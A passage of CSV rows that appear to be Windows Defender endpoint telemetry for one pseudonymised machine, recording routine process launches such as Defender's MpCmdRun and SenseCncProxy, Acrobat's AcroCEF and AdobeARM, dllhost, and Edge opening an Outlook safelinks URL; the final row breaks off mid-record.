+1366,True,System,S-1-5-20,NETWORK SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 06:52:30.229310800+00:00,19000,MpCmdRun.exe,"""MpCmdRun.exe"" GetDeviceTicket -AccessKey 8F1727DA-705F-53E3-747D-9581D75D1121 ",PortableExecutable,2021-06-14 00:56:51.807361100+00:00,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,644888,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,cecd78f3ee9d8d5cdb381f3c60ae8b1a,404d8d6ac0005cd7b57aa779ff7aca223c27cef4820c94de0a39c21604d4652b,f70eca243b0409cea2f8f642274cc13f23a22a25,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-14 00:56:58.859290200+00:00,2848,MsMpEng.exe,"""MsMpEng.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 06:52:31.107526100+00:00,2021-06-23 06:54:38.214380+00:00,d0e5bf67-962e-47bf-8b8d-47ed77bb3194,computerpii_0a470890c60768167990033d701e7bd881398861,164608,False,10.7740.19041.1052,False,11540474045145394,,11540474045173986,2021-06-14 00:56:58.859290200+00:00,2848,2021-06-14 00:56:58.859290200+00:00,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MsMpEng.exe,2848,18560,ActiveProcessStartkey,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0,136656,1998-01-06 16:00:45+00:00,2021-06-14 00:56:50.126000+00:00,2021-06-14 00:56:58.853571700+00:00,2021-06-14 00:56:51.807361100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,996,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MsMpEng.exe,MsMpEng.exe,Antimalware Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility
+1367,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 04:25:05.980008300+00:00,4112,dllhost.exe,DllHost.exe /Processid:{45BA127D-10A8-46EA-8AB7-56EA9078943C},PortableExecutable,2020-10-09 20:47:24.152425900+00:00,C:\Windows\System32\dllhost.exe,21312,08eb78e5be019df044c26b14703bd1fa,e7fc40b41aa8b83841a0b96d169eaf0800aa784733e636935374d56536253f10,2ce12a317bebf8293f3544433a55d972a5967996,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 04:25:06.304675800+00:00,2021-06-23 04:26:14.823594+00:00,e4461e53-b24d-4fb6-8372-4d4aca8f417a,computerpii_0a470890c60768167990033d701e7bd881398861,162564,True,10.7740.19041.1052,False,11540474045136908,,11540474045173419,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,dllhost.exe,dllhost.exe,COM Surrogate
+1368,True,System,S-1-5-20,NETWORK SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 02:40:54.934001500+00:00,19384,MpCmdRun.exe,"""MpCmdRun.exe"" GetDeviceTicket -AccessKey B89E764B-CAA1-0F1E-100D-7A9883693CCA ",PortableExecutable,2021-06-14 00:56:51.807361100+00:00,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,644888,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,cecd78f3ee9d8d5cdb381f3c60ae8b1a,404d8d6ac0005cd7b57aa779ff7aca223c27cef4820c94de0a39c21604d4652b,f70eca243b0409cea2f8f642274cc13f23a22a25,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-14 00:56:58.859290200+00:00,2848,MsMpEng.exe,"""MsMpEng.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 02:40:55.818398200+00:00,2021-06-23 02:41:37.473062+00:00,252f02c0-4a76-44d2-af9c-6b388ec86fa1,computerpii_0a470890c60768167990033d701e7bd881398861,159884,False,10.7740.19041.1052,False,11540474045145394,,11540474045172786,2021-06-14 00:56:58.859290200+00:00,2848,2021-06-14 00:56:58.859290200+00:00,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MsMpEng.exe,2848,18560,ActiveProcessStartkey,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0,136656,1998-01-06 16:00:45+00:00,2021-06-14 00:56:50.126000+00:00,2021-06-14 00:56:58.853571700+00:00,2021-06-14 00:56:51.807361100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,996,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MsMpEng.exe,MsMpEng.exe,Antimalware Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility
+1369,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:22:22.377204700+00:00,2208,AcroCEF.exe,"""AcroCEF.exe"" --type=gpu-process --field-trial-handle=1908,12044919889243289069,12882310414426751854,131072 --disable-features=NetworkService,VizDisplayCompositor --disable-pack-loading --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --log-severity=disable --product-version=""AcrobatServices/21.5.20048 Chrome/Ipv4PII_d1b09f1987215a731ca836b99c07a53884670a01"" --lang=en-US --gpu-preferences=KAAAAAAAAADgACAgAQAAAAAAAAAAAGAAAAAAABAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --use-gl=swiftshader-webgl --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --service-request-channel-token=4607197471404871574 --mojo-platform-channel-handle=2196 --allow-no-sandbox-job --ignored="" --type=renderer "" /prefetch:2",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,7230688,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 01:22:22.117798700+00:00,5760,AcroCEF.exe,"""AcroCEF.exe"" --backgroundcolor=16514043",False,2021-06-23 01:22:19.362041700+00:00,5684,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe,Low,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:22:22.382709600+00:00,2021-06-23 01:23:34.707000900+00:00,8c5ea521-a4b3-42df-9718-16a03f26ba24,computerpii_0a470890c60768167990033d701e7bd881398861,158022,False,10.7740.19041.1052,False,11540474045172410,,11540474045172414,2021-06-23 01:22:22.117798700+00:00,5760,2021-06-23 01:22:22.117798700+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,5760,128,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF,7230688,2021-05-28 05:11:15+00:00,2021-05-28 05:58:58+00:00,2021-06-23 00:53:49.095230100+00:00,2021-05-28 05:58:58+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,0.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,,,,,,,,,,,,
+1370,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:22:23.954499200+00:00,7720,AcroCEF.exe,"""AcroCEF.exe"" --type=renderer --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --touch-events=enabled --field-trial-handle=1908,12044919889243289069,12882310414426751854,131072 --disable-features=NetworkService,VizDisplayCompositor --disable-gpu-compositing --lang=en-US --disable-pack-loading --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --log-severity=disable --product-version=""AcrobatServices/21.5.20048 Chrome/Ipv4PII_d1b09f1987215a731ca836b99c07a53884670a01"" --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=8857034917045716248 --renderer-client-id=6 --mojo-platform-channel-handle=2356 --allow-no-sandbox-job /prefetch:1",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,7230688,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 01:22:22.117798700+00:00,5760,AcroCEF.exe,"""AcroCEF.exe"" --backgroundcolor=16514043",False,2021-06-23 01:22:19.362041700+00:00,5684,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe,Low,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:22:24.032133900+00:00,2021-06-23 01:23:34.707477300+00:00,f8e8814d-4352-4111-9cb8-7bcadba1e2b7,computerpii_0a470890c60768167990033d701e7bd881398861,158029,False,10.7740.19041.1052,False,11540474045172410,,11540474045172415,2021-06-23 01:22:22.117798700+00:00,5760,2021-06-23 01:22:22.117798700+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,5760,128,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF,7230688,2021-05-28 05:11:15+00:00,2021-05-28 05:58:58+00:00,2021-06-23 00:53:49.095230100+00:00,2021-05-28 05:58:58+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,0.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,,,,,,,,,,,,
+1371,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:22:26.335314900+00:00,17776,AdobeARM.exe,"""AdobeARM.exe"" /PRODUCT:Acrobat /VERSION:21.0 /MODE:3",PortableExecutable,2021-01-25 13:55:56+00:00,C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe,1557200,b8b96354dd88484208f17101f6704f7c,ad25d9f873a80f454ce2acbb75246463070e216c89b042ee87b9a6204dd146c0,68815c39f47a0b8f766d9191e7ac55d3199d1c96,ac7d72262c5389c8cbe58cdddd2083a3,9d84b01f481959d4c8c335af7c1473ba831b698387441a05713527f1dbb517d2,6daf3b0133be331cf2e41a8f4180f01653b91845,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 01:22:19.362041700+00:00,5684,Acrobat.exe,"""Acrobat.exe"" ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\UWEMRD7K\FilePII_f7cb604f766e93a9393ab91047022e32e49197c5.pdf""",False,2021-06-23 00:51:43.564026600+00:00,16176,OUTLOOK.EXE,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:22:26.350662300+00:00,2021-06-23 01:23:34.707840900+00:00,1117b58b-b20e-4388-a49d-193300fcfba3,computerpii_0a470890c60768167990033d701e7bd881398861,158039,False,10.7740.19041.1052,False,11540474045172397,,11540474045172416,2021-06-23 01:22:19.362041700+00:00,5684,2021-06-23 01:22:19.362041700+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe,5684,128,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat,3796704,2021-05-28 05:30:12+00:00,2021-05-28 05:58:58+00:00,2021-06-23 01:22:19.361002600+00:00,2021-05-28 05:58:58+00:00,256,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,,10.0,1.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Adobe Systems Incorporated,Adobe Acrobat DC,21.5.20048.436468,,Acrobat.exe,Adobe Acrobat DC ,Adobe Inc.,Adobe Reader and Acrobat Manager,1.824.42.0176,AdobeARM.exe,AdobeARM.exe,Adobe Reader and Acrobat Manager
+1372,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:15:39.568820+00:00,16068,SenseCncProxy.exe,2652,PortableExecutable,2021-05-12 01:12:26.930234800+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe,744776,affeaa20cf87ef4bbdc1529ab7fea66d,617bacf42b34dfb44986b4c855f07a7db54b27b6a5a78101bf4e53945d4e65b6,b19ae47bee16c9e6111db0ce54ee8ab52b32273d,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:15:39.623017200+00:00,2021-06-23 01:17:40.740638+00:00,d1a0f38d-c1a3-47da-902f-35c0ed04ad9a,computerpii_0a470890c60768167990033d701e7bd881398861,157452,False,10.7740.19041.1052,False,11540474045137006,,11540474045172262,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,18560,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.964,SenseCncProxy.exe,SenseCncProxy.exe,Windows Defender Advanced Threat Protection Communications module
+1373,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:15:58.688396200+00:00,5708,SenseCncProxy.exe,4356,PortableExecutable,2021-05-12 01:12:26.930234800+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe,744776,affeaa20cf87ef4bbdc1529ab7fea66d,617bacf42b34dfb44986b4c855f07a7db54b27b6a5a78101bf4e53945d4e65b6,b19ae47bee16c9e6111db0ce54ee8ab52b32273d,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:15:58.865953500+00:00,2021-06-23 01:17:40.740924+00:00,1619bf06-b615-4925-be2d-5d6c126b5949,computerpii_0a470890c60768167990033d701e7bd881398861,157457,False,10.7740.19041.1052,False,11540474045137006,,11540474045172263,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,MsSense.exe,4916,256,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.964,SenseCncProxy.exe,SenseCncProxy.exe,Windows Defender Advanced Threat Protection Communications module
+1374,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:15:59.593416800+00:00,7724,SgrmLpac.exe,SgrmLpac.exe,PortableExecutable,2020-10-09 20:47:52.796409800+00:00,C:\Windows\System32\SgrmLpac.exe,57144,7e4f5ee531a80e80b2ab7cc2f5621eec,249b9a3a875af413328bc559620fec131a0db707cb6b46001c752adcf3e043df,9019dfd840c8ab98469a401f58ed752f42191ea9,3ba1a18a0dc30a0545e7765cb97d8e63,f9cbf1ff87d6f11920c4b7367ea2178bf13aa276c65d918950683983f268bc1f,9b39f815ca4416bff574d01c90d03d2df2a0bdd7,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:22.466683200+00:00,7904,SgrmBroker.exe,SgrmBroker.exe,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:16:00.182746300+00:00,2021-06-23 01:17:40.741029400+00:00,721805eb-7c96-433c-9c26-9fa364f41b90,computerpii_0a470890c60768167990033d701e7bd881398861,157459,False,10.7740.19041.1052,False,11540474045137039,,11540474045172266,2021-06-10 00:46:22.466683200+00:00,7904,2021-06-10 00:46:22.466683200+00:00,\Device\HarddiskVolume3\Windows\System32\SgrmBroker.exe,7904,128,ActiveProcessStartkey,C:\Windows\System32,329504,2092-04-28 08:19:05+00:00,2020-10-09 20:47:52.796409800+00:00,2021-06-10 00:46:22.468696900+00:00,2020-10-09 20:47:52.796409800+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,SgrmBroker,SgrmBroker.exe,System Guard Runtime Monitor Broker Service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,SgrmLpac,SgrmLpac.exe,System Guard Runtime Monitor LPAC
+1375,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:16:04.437961100+00:00,5000,SenseCncProxy.exe,4944,PortableExecutable,2021-05-12 01:12:26.930234800+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe,744776,affeaa20cf87ef4bbdc1529ab7fea66d,617bacf42b34dfb44986b4c855f07a7db54b27b6a5a78101bf4e53945d4e65b6,b19ae47bee16c9e6111db0ce54ee8ab52b32273d,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:16:04.654068900+00:00,2021-06-23 01:17:40.741516100+00:00,d276328a-5fa6-4640-a854-271cd5895933,computerpii_0a470890c60768167990033d701e7bd881398861,157467,False,10.7740.19041.1052,False,11540474045137006,,11540474045172268,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,18560,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.964,SenseCncProxy.exe,SenseCncProxy.exe,Windows Defender Advanced Threat Protection Communications module
+1376,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:16:40.056567800+00:00,18080,msedge.exe,"""msedge.exe"" --single-argument https://apc01.safelinks.protection.outlook.com/?url=https%3A%2F%2Fkyc.blockpass.org%2Fkyc%2Fdashboard%2F%23%2Ffirst_digital_trust_c1c7e%2Fkyc_list&data=04%7C01%7C%7Cf18a8d27710b4146b58108d935e23cb4%7C943328ecec1048dc8344a281b9e5ac52%7C0%7C0%7C637600068082638440%7CUnknown%7CTWFpbGZsb3d8eyJ**********",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278224,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,553bf7f8c0e762a4c89b34bc6a1e8472,40d1ffbfc08e1c8fdbf1424840b87dc7f6b64cd8ab495a498aaf8cb0df715dc9,222ef0a57b2bb0eab87583daa000f1c8bca664b9,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:43.564026600+00:00,16176,OUTLOOK.EXE,"""OUTLOOK.EXE"" ",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:16:40.120034+00:00,2021-06-23 01:17:40.743431500+00:00,1ac41e2f-a718-410c-b251-cf5eee69147e,computerpii_0a470890c60768167990033d701e7bd881398861,157501,False,10.7740.19041.1052,False,11540474045171845,,11540474045172280,2021-06-23 00:51:43.564026600+00:00,16176,2021-06-23 00:51:43.564026600+00:00,\Device\HarddiskVolume3\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE,16176,18560,ActiveProcessStartkey,C:\Program Files\Microsoft Office\root\Office16,41367344,2021-06-03 12:43:37+00:00,2021-06-12 08:57:23.589811200+00:00,2021-06-23 00:51:43.826220200+00:00,2021-06-12 08:57:23.540503500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,1.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft 